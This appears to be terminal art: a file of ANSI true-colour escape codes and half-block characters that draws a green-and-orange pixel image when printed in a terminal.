\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[0m\e[38;2;99;149;87m▄\e[0m
\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m
\e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m
\e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m
\e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m
\e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m
\e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m
\e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m
\e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m
\e[0m
\e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m
\e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m
\e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m
\e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m
\e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m
\e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m
\e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m
\e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[48;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m
\e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m
\e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m
\e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m
\e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m
\e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m
\e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m
\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m
\e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m
\e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m
\e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;73;218;37m
\e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m
\e[48;2;73;218;37m \e[48;2;73;218;37m
\e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m
\e[0m \e[48;2;51;78;45m
